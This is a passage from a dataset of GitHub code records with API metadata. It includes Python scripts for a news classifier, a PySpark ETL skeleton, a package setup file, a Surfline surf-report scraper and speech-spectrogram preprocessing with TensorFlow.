activation='softmax'))\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nmodel.fit(x_train, y_train, epochs=3)\n\naccr = model.evaluate(x_test,y_test)\nprint('Test set\\n Loss: {:0.3f}\\n Accuracy: {:0.3f}'.format(accr[0],accr[1]))\n\nmodel.save(MODEL_FILE)\ndel model\n", "repo_name": "yitongw2/Tap-News", "sub_path": "news_classifier/trainer/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.normpath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, 
{"api_name": "os.path.normpath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 32, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "preprocessor.PreProcessor.clean_text", "line_number": 42, "usage_type": "call"}, {"api_name": "preprocessor.PreProcessor", "line_number": 42, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.text.Tokenizer", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 69, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 71, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 73, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 74, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 75, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "5365923917", "text": "\"\"\"This module is the entry-point for the run.py to handle spark session \\\nbuilding and ETL.\"\"\"\n\nimport contextlib\nfrom pyspark.sql import SparkSession\nfrom pathlib import Path\nfrom typing import Generator\n\nfrom src.jobs import extract, transform, load\nfrom src.jobs.utils.general import EnvEnum\nfrom src.jobs.utils.log_utils import Logger\n\n\ndef jobs_main(spark: SparkSession, logger: Logger, file_path: str) -> None:\n \"\"\"\n High-level function to perform the ETL job.\n\n Args:\n spark (SparkSession) : spark session to perform ETL job\n logger (Logger) : logger class instance\n file_path (str): path on which the job will be performed\n\n \"\"\"\n df = extract.extract_file(spark, file_path)\n logger.info(f\"{file_path} extracted to DataFrame\")\n\n count_df = transform.transform_df(df)\n logger.info(\"Counted words in the DataFrame\")\n\n load.write_to_path(count_df)\n logger.info(\"Written counted words to path\")\n\n\n@contextlib.contextmanager\ndef spark_build(env: EnvEnum) -> Generator[SparkSession, None, None]:\n \"\"\"\n Build the spark object.\n\n Args:\n env (EnvEnum): environment of the spark-application\n\n Yields:\n SparkSession object\n\n \"\"\"\n spark_builder = SparkSession.builder\n app_name = Path(__file__).parent.name\n\n if env == EnvEnum.dev:\n spark = spark_builder.appName(app_name).getOrCreate()\n else:\n raise NotImplementedError\n try:\n yield spark\n finally:\n spark.stop()\n", "repo_name": "datarootsio/skeleton-pyspark", "sub_path": "src/jobs/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1486, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "src.jobs.utils.log_utils.Logger", "line_number": 14, "usage_type": "name"}, {"api_name": "src.jobs.extract.extract_file", "line_number": 24, "usage_type": "call"}, {"api_name": "src.jobs.extract", "line_number": 24, "usage_type": "name"}, {"api_name": "src.jobs.transform.transform_df", "line_number": 27, "usage_type": "call"}, {"api_name": "src.jobs.transform", "line_number": 27, "usage_type": "name"}, {"api_name": "src.jobs.load.write_to_path", "line_number": 30, "usage_type": "call"}, {"api_name": "src.jobs.load", "line_number": 30, "usage_type": "name"}, {"api_name": "src.jobs.utils.general.EnvEnum", "line_number": 35, "usage_type": "name"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "call"}, {"api_name": "src.jobs.utils.general.EnvEnum.dev", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.jobs.utils.general.EnvEnum", "line_number": 49, "usage_type": "name"}, {"api_name": "contextlib.contextmanager", "line_number": 34, "usage_type": "attribute"}, {"api_name": "typing.Generator", "line_number": 35, "usage_type": "name"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "21357556973", "text": "import os\nimport sys\nimport re\nimport setuptools\nfrom setuptools import find_packages\n\ndef get_version():\n \"\"\"\n Returns the package version declared in the __init__.py file\n \"\"\"\n VERSIONFILE = os.path.join('gis_packer', '__init__.py')\n initfile_lines = open(VERSIONFILE, 'rt').readlines()\n VSRE = r'^__version__ = [\\\"\\']*([\\d\\w.]+)[\\\"\\']'\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n raise RuntimeError(f'Unable to find version string in {VERSIONFILE}')\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"gis_packer\",\n description=\"ETL tool for raster\",\n version=get_version(),\n author=\"Jean-Romain Roy\",\n author_email=\"jroy@gisaerobot.com\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/gis-Aerobot/gis-packer\",\n packages=find_packages(exclude=['tests']),\n include_package_data=True,\n zip_safe=True,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: proprietary and confidential\",\n \"Operating System :: UNIX\",\n ],\n install_requires=[\n 'click',\n 'humanize',\n 'tqdm',\n 'psycopg2',\n 'sqlalchemy',\n 'numpy',\n 'matplotlib',\n 'pandas',\n 'shapely',\n 'boto3',\n 'geopandas',\n 'rasterio',\n 'toolz',\n 'dask',\n 'xarray'\n ],\n python_requires='>=3.6',\n)", "repo_name": "jeanromainroy/gis-packer", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 15, "usage_type": "call"}, {"api_name": "re.M", "line_number": 15, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 24, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "73406574172", "text": "import argparse\nimport cv2\nfrom pathlib import Path\nimport os\nimport random\nimport shutil\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--annotation', default='./training_data', type=str,\n help='The folder path to videos.')\nparser.add_argument('--output', default='./annotation', type=str,\n help='The folder for the annotation files.')\n\ndef write_annotation(file_list, output_path):\n annotation_str = \"\\n\".join(map(lambda record: \" \".join(map(str, record)), file_list))\n\n with open(output_path, \"w+\", newline='') as flist_file:\n flist_file.write(annotation_str)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n output_file = args.output\n annotation = args.annotation\n\n with open(annotation, 'r') as file:\n content = file.read()\n lines = content.splitlines()\n lines = [tuple(line.split()) for line in lines]\n\n lines = [(os.path.relpath(line[0],'.'),line[1],line[2],line[3]) for line in lines]\n\n write_annotation(file_list=lines,output_path=output_file)", "repo_name": "linkhack/Camera-Movement-Classification", "sub_path": "Develop/make_relative.py", "file_name": "make_relative.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "7454558282", "text": "class surfline_spot_scraper():\n \n def __init__(self, page_html, driver):\n self.page_html = page_html\n self.driver = driver\n \n def fetch(self, feature_name, content_idx=None):\n from bs4 import BeautifulSoup\n import re\n from datetime import datetime\n\n \"\"\"Returns surf spot's respective numerical data using BeautifulSoup scraping tools. Try/excepts statements \n are used in case page html changes. If page html changes then None value is returned and diagnostic message is\n printed. \n \n Keyword arguments:\n feaure_name -- feature value to be scraped type(str)\n content_idx -- optional integer value to pass if scraping command requires an idx\n \"\"\"\n\n if feature_name=='report update time':\n try:\n update_time = self.page_html.find('span', class_='quiver-forecaster-profile__update-container__last-update').contents[3]\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return datetime.strptime(re.findall(r'\\d+:\\d+[pa]m', update_time)[0], '%I:%M%p')\n\n elif feature_name=='condition':\n try:\n return self.page_html.find('div', class_='quiver-spot-report').contents[0].text\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n\n elif feature_name=='surf height':\n try:\n raw_surf_height = self.page_html.find('div', 'quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height').find(class_='quiver-surf-height').contents[0]\n except AttributeError:\n try:\n flat_surf = self.page_html.find('div', class_='quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height quiver-spot-forecast-summary__stat-container--surf-height--expired').find('span', class_='quiver-surf-height quiver-surf-height--flat').text\n except AttributeError:\n try:\n expired_surf_height = self.page_html.find('div', class_='quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height quiver-spot-forecast-summary__stat-container--surf-height--expired').find(class_='quiver-surf-height').text\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return 'expired'\n else:\n return 0.0\n else:\n if raw_surf_height == 'Flat':\n return 0.0\n else:\n surf_height_range = list(map(float, re.findall(r'\\d+', raw_surf_height)))\n return sum(surf_height_range) / len(surf_height_range)\n\n elif feature_name=='swell':\n try:\n raw_ft = self.page_html.find_all('span', class_='quiver-swell-measurements__units')[content_idx].previous_element\n raw_secs = self.page_html.find_all('span', class_='quiver-swell-measurements__units')[content_idx].next_element.next_element\n raw_degrees = self.page_html.find_all('span', class_='quiver-swell-measurements__direction')[content_idx].text\n except AttributeError:\n swell_ft = None\n swell_secs = None\n swell_degrees = None\n print('Update html: ', feature_name)\n except IndexError:\n swell_ft = 0\n swell_secs = 0\n swell_degrees = 0\n else:\n swell_ft = float(re.findall(r'\\d+\\.\\d+|\\d+', raw_ft)[0])\n swell_secs = int(re.findall(r'\\d+', raw_secs)[0])\n swell_degrees = int(re.findall(r'\\d+', raw_degrees)[0])\n return swell_ft, swell_secs, swell_degrees\n\n elif feature_name=='current tide':\n try:\n tide = self.page_html.find('span', class_='quiver-reading').text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+\\.\\d+|\\d+', tide)[0])\n\n elif 
feature_name=='local extrema tide':\n try:\n local_extrema_tide = self.page_html.find_all('span', class_='quiver-reading-description')[1].text\n except (AttributeError,IndexError) as e:\n local_extrema_tide_ft = None\n local_extrema_tide_time = None\n print('Update html for: {} ... Error: {}', feature_name, e)\n else:\n local_extrema_tide_ft = float(re.findall(r'-?\\d+\\.\\d+(?=\\s?ft)|-?\\d+(?=\\s?ft)', local_extrema_tide)[0])\n local_extrema_tide_time = datetime.strptime(re.findall(r'\\d+:\\d+[pa]m', local_extrema_tide)[0], '%I:%M%p')\n return local_extrema_tide_ft, local_extrema_tide_time\n \n elif feature_name=='wind mph':\n try:\n raw_wind_mph = self.page_html.find_all('span', class_='quiver-reading')[1].text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+', raw_wind_mph)[0])\n \n elif feature_name=='wind degrees':\n try:\n raw_wind_degrees = self.page_html.find_all('span', class_='quiver-reading-description')[2].text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+', raw_wind_degrees)[0])\n\n elif feature_name=='air temperature':\n try:\n air_temp = self.page_html.find('div', class_='quiver-weather-stats').find('div').contents[1]\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(air_temp)\n \n elif feature_name=='ocean temperature':\n try:\n water_temp_range = self.page_html.find('div', class_='quiver-water-temp').find('div')\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return (float(water_temp_range.contents[1]) + int(water_temp_range.contents[5])) / 2\n\n elif feature_name=='daylight':\n try:\n daylight = self.page_html.find('table', class_='quiver-forecast-graphs__table quiver-forecast-graphs__table--sunlight-times').find_all('td')\n except AttributeError:\n first_light = 'update html'\n sunrise = 'update html'\n sunset = 'update html'\n last_light = 'update html'\n else:\n first_light = datetime.strptime(daylight[1].text, '%I:%M%p')\n sunrise = datetime.strptime(daylight[3].text, '%I:%M%p')\n sunset = datetime.strptime(daylight[5].text, '%I:%M%p')\n last_light = datetime.strptime(daylight[7].text, '%I:%M%p')\n return first_light, sunrise, sunset, last_light\n\n elif feature_name=='description':\n try:\n description = self.page_html.find('div', class_='quiver-spot-report__report-text').find_all('p')[:-1]\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return ''.join(p.get_text() for p in description).replace('\\n', '').replace('\\xa0', '')\n else:\n return 'feature_name options: '\n\n def spot_dict(self, surf_spot):\n from datetime import datetime\n import time\n import os\n import csv\n\n \"\"\"Returns surf spot dictionary\"\"\"\n\n swell_one_ft, swell_one_secs, swell_one_degrees = self.fetch('swell', content_idx=0)\n swell_two_ft, swell_two_secs, swell_two_degrees = self.fetch('swell', content_idx=3)\n swell_three_ft, swell_three_secs, swell_three_degrees = self.fetch('swell', content_idx=2)\n \n local_extrema_tide_ft, local_extrema_tide_time = self.fetch('local extrema tide')\n\n first_light, sunrise, sunset, last_light = self.fetch('daylight')\n \n spot_dict = {\n 'scraped_time': datetime.now(),\n 'report_update_time': self.fetch('report update time'),\n 'condition': self.fetch('condition'),\n 'surf_height': self.fetch('surf height'),\n 'swell_one_ft': 
swell_one_ft,\n 'swell_one_secs': swell_one_secs,\n 'swell_one_degrees': swell_one_degrees,\n 'swell_two_ft': swell_two_ft,\n 'swell_two_secs': swell_two_secs,\n 'swell_two_degrees': swell_two_degrees,\n 'swell_three_ft': swell_three_ft,\n 'swell_three_secs': swell_three_secs,\n 'swell_three_degrees': swell_three_degrees,\n 'current_tide': self.fetch('current tide'),\n 'local_extrema_tide_ft': local_extrema_tide_ft,\n 'local_extrema_tide_time': local_extrema_tide_time,\n 'wind_mph': self.fetch('wind mph'),\n 'wind_degrees': self.fetch('wind degrees'),\n 'air_temp_f': self.fetch('air temperature'),\n 'ocean_temp_f': self.fetch('ocean temperature'),\n 'first_light': first_light,\n 'sunrise': sunrise,\n 'sunset': sunset,\n 'last_light': last_light,\n 'description': self.fetch('description')\n }\n \n #filename for csv file\n spot_dir = 'data/'+surf_spot+'.csv'\n\n #append dictionary to respective spot csv file\n if os.path.isfile(spot_dir):\n with open(spot_dir, 'a') as f:\n w = csv.DictWriter(f, spot_dict.keys())\n w.writerow(spot_dict)\n else:\n #init csv file with column header\n with open(spot_dir, 'w') as f:\n w = csv.DictWriter(f, spot_dict.keys())\n w.writeheader()\n w.writerow(spot_dict)\n\n def cam_screenshot(self, surf_spot):\n from selenium import webdriver\n import time\n from datetime import datetime\n from bs4 import BeautifulSoup\n import sys\n \n #init cursor location on chart header above surf cam video\n element = self.driver.find_elements_by_xpath('//div[@class=\"sl-forecast-header__nav__page-level__link__text\"]')[2]\n action = webdriver.common.action_chains.ActionChains(self.driver)\n\n #move cursor to surf cam block\n action.move_to_element_with_offset(element, 5, 200)\n\n #start surf cam video\n action.click()\n action.perform()\n print('\\tStarting Ad #1')\n #play/pause/stop button on the botton right corner of surf cam\n try:\n ad_button = self.page_html.find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n except TypeError:\n self.driver.quit()\n sys.exit('Update ad button html')\n\n #Check for when the advertisement stops\n while ad_button != 'Stop':\n time.sleep(10)\n ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n \n print('\\tFullscreen surf cam')\n #full screen the surf cam\n action.double_click()\n action.perform()\n \n #get datetime used for labeling screenshot filename\n screenshot_datetime = datetime.now()\n print('\\tScreenshot Captured')\n\n #save surf cam screen shot to respective surf spot screenshot dir\n self.driver.save_screenshot('screenshots/{}/{}{}{}_{}_{}.png'.format(surf_spot, screenshot_datetime.year, screenshot_datetime.month, \n screenshot_datetime.day, screenshot_datetime.hour, \n screenshot_datetime.minute))\n\n # #reinitiate ad button variable\n # ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n \n # #Check for when the advertisement #2 stops\n # print('\\tChecking for Ad #2')\n # while ad_button != 'Stop':\n # time.sleep(10)\n # ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n # time.sleep(4)\n \n # #get datetime used for labeling screenshot filename\n # screenshot_datetime = datetime.now()\n # print('\\tScreenshot Captured')\n\n 
# #save surf cam screen shot to respective surf spot screenshot dir\n # self.driver.save_screenshot('screenshots/{}/{}{}{}_{}_{}.png'.format(surf_spot, screenshot_datetime.year, screenshot_datetime.month, \n # screenshot_datetime.day, screenshot_datetime.hour, \n # screenshot_datetime.minute))\n", "repo_name": "marshall7m/surfline_scraper", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 13588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 28, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 75, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 76, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 77, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 87, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 98, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 108, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 117, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path", "line_number": 211, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 213, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 218, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 231, "usage_type": "call"}, {"api_name": "selenium.webdriver.common", "line_number": 231, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 231, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 245, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 249, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 250, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 258, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 258, "usage_type": "name"}]}
+{"seq_id": "19665256362", "text": "import tensorflow as tf\nimport os\nimport argparse\nimport multiprocessing as mp\n\n_SAMPLE_RATE = 16000\n\n\ndef read_audio(fname):\n audio_binary = tf.read_file(fname)\n waveform = tf.contrib.ffmpeg.decode_audio(\n audio_binary,\n file_format='wav',\n samples_per_second=_SAMPLE_RATE,\n channel_count=1)[:, 0]\n num_samples = tf.shape(waveform)[0]\n pad_front = (_SAMPLE_RATE - num_samples) // 2\n pad_back = (_SAMPLE_RATE - num_samples) - pad_front\n waveform = tf.pad(waveform, [[pad_front, pad_back]])\n return waveform, fname\n\n\ndef make_spectrogram(dataset):\n frame_length = FLAGS.frame_length * _SAMPLE_RATE // 1e3\n frame_step = FLAGS.frame_step * _SAMPLE_RATE // 1e3\n stfts = tf.contrib.signal.stft(\n dataset,\n frame_length=tf.cast(frame_length, tf.int32),\n frame_step=tf.cast(frame_step, tf.int32),\n fft_length=tf.cast(frame_length, tf.int32))\n magnitude_spectrograms = tf.abs(stfts)\n log_offset = 1e-6\n log_magnitude_spectrograms = tf.log(magnitude_spectrograms + log_offset)\n return tf.cast(log_magnitude_spectrograms, tf.float32)\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(array):\n if array.ndim > 1:\n array = array.ravel()\n return tf.train.Feature(float_list=tf.train.FloatList(value=array))\n\n\ndef main():\n test_words = [\"yes\", \"no\", \"up\", \"down\", \"left\", \"right\", \"on\", \"off\", \"stop\", \"go\"]\n aux_words = [\"bed\", \"bird\", \"cat\", \"dog\", \"happy\", \"house\", \"marvin\", \"sheila\", \"tree\", \"wow\"]\n full_word_list = os.listdir(os.path.join(FLAGS.dataset_path, 'train', 'audio'))\n del full_word_list[full_word_list.index('_background_noise_')]\n\n # our order will go:\n # 1. the 10 words to classify on the test set: test_words\n # 2. words that aren't one of the test set words but have a \"regular\" class representation\n # 3. 
words that aren't in the test set and are underrepresented in the training set: aux words\n # this will let us more easily clip labels and train on reduced sets of labels\n words = [word for word in test_words]\n words += [word for word in full_word_list if word not in (aux_words + test_words)]\n words += aux_words\n\n with open('{}/train/validation_list.txt'.format(FLAGS.dataset_path), 'r') as f:\n validation_files = f.read().split(\"\n\")[:-1]\n validation_files = ['{}/train/audio/{}'.format(FLAGS.dataset_path, i) for i in validation_files]\n\n with open('{}/train/testing_list.txt'.format(FLAGS.dataset_path), 'r') as f:\n pseudo_test_files = f.read().split(\"\n\")[:-1]\n pseudo_test_files = ['{}/train/audio/{}'.format(FLAGS.dataset_path, i) for i in pseudo_test_files]\n\n train_files = []\n for word in words:\n for fname in os.listdir('{}/train/audio/{}'.format(FLAGS.dataset_path, word)):\n filename = '{}/train/audio/{}/{}'.format(FLAGS.dataset_path, word, fname)\n if filename not in validation_files and filename not in pseudo_test_files:\n train_files.append(filename)\n\n # test_files = os.listdir('{}/test/audio'.format(FLAGS.dataset_path))\n\n dataset_files = {\n 'train': train_files,\n 'valid': validation_files,\n 'ptest': pseudo_test_files,\n # 'test': test_files\n }[FLAGS.subset]\n\n\n # build a *SYMBOLIC* representation of our dataset\n # read audio files, batch them, build spectrograms\n dataset = tf.data.Dataset.from_tensor_slices(dataset_files)\n dataset = dataset.apply(\n tf.data.experimental.map_and_batch(\n map_func=read_audio,\n batch_size=FLAGS.batch_size,\n num_parallel_calls=mp.cpu_count())\n )\n dataset = dataset.prefetch(None)\n iterator = dataset.make_initializable_iterator()\n audio, labels = iterator.get_next()\n spectrograms = make_spectrogram(audio)\n\n # now we'll actually iterate through and build the spectrograms,\n # then save them out to a TFRecord file\n # if we're doing the training set, we'll also track the pixel-wise mean\n # and variance across all spectrograms and save them to a stats TFRecord file\n filename = '{}/{}.tfrecords'.format(FLAGS.dataset_path, FLAGS.subset)\n writer = tf.python_io.TFRecordWriter(filename)\n\n sess = tf.Session()\n sess.run(iterator.initializer)\n\n print(\"Building tfrecord file {}\".format(filename))\n progbar = tf.keras.utils.Progbar(len(dataset_files))\n first = True\n while True:\n try:\n # get a batch\n specs, labs = sess.run([spectrograms, labels])\n\n # if training set, update our tally of pixel wise stats\n if first and FLAGS.subset == 'train':\n mean, var = specs.sum(axis=0), (specs**2).sum(axis=0)\n first = False\n elif FLAGS.subset == 'train':\n mean += specs.sum(axis=0)\n var += (specs**2).sum(axis=0)\n\n # now loop through each spectrogram and label and add them to TFRecord\n # as an \"example\" containing named \"features\"\n for spectrogram, label in zip(specs, labs):\n feature = {\n 'spec': _float_feature(spectrogram),\n 'label': _bytes_feature(b\"/\".join(label.split(b\"/\")[-2:]))\n }\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n writer.write(example.SerializeToString())\n progbar.add(len(specs))\n # dataset has been exhausted, we're done\n except tf.errors.OutOfRangeError:\n break\n writer.close()\n\n if FLAGS.subset == 'train':\n # average out our stats, using $\sigma^2$ = E[x^2] - (E[x])^2\n mean /= len(dataset_files)\n var /= len(dataset_files)\n var -= mean**2\n\n writer = tf.python_io.TFRecordWriter('{}/stats.tfrecords'.format(FLAGS.dataset_path))\n features = {\n 'mean': 
_float_feature(mean),\n 'var': _float_feature(var)\n }\n example = tf.train.Example(features=tf.train.Features(feature=features))\n writer.write(example.SerializeToString())\n writer.close()\n\n with open(os.path.join(FLAGS.dataset_path, 'labels.txt'), 'w') as f:\n f.write(','.join(words))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset_path',\n type=str,\n default='/data',\n help='path to data')\n\n parser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='number of samples to process at once')\n \n parser.add_argument(\n '--log_every',\n type=int,\n default=50,\n help='batches between print logging')\n\n parser.add_argument(\n '--frame_length',\n type=int,\n default=20,\n help=\"length of spectrogram FFT in ms\")\n\n parser.add_argument(\n '--frame_step',\n type=int,\n default=10,\n help=\"time between FFT windows in ms\")\n\n parser.add_argument(\n '--subset',\n type=str,\n help='what subset to preprocess')\n\n FLAGS = parser.parse_args()\n main()\n", "repo_name": "alecgunny/tf-speech-recognition", "sub_path": "preproc/preproc.py", "file_name": "preproc.py", "file_ext": "py", "file_size_in_byte": 6618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tensorflow.read_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.contrib.ffmpeg.decode_audio", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.contrib.signal.stft", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 26, 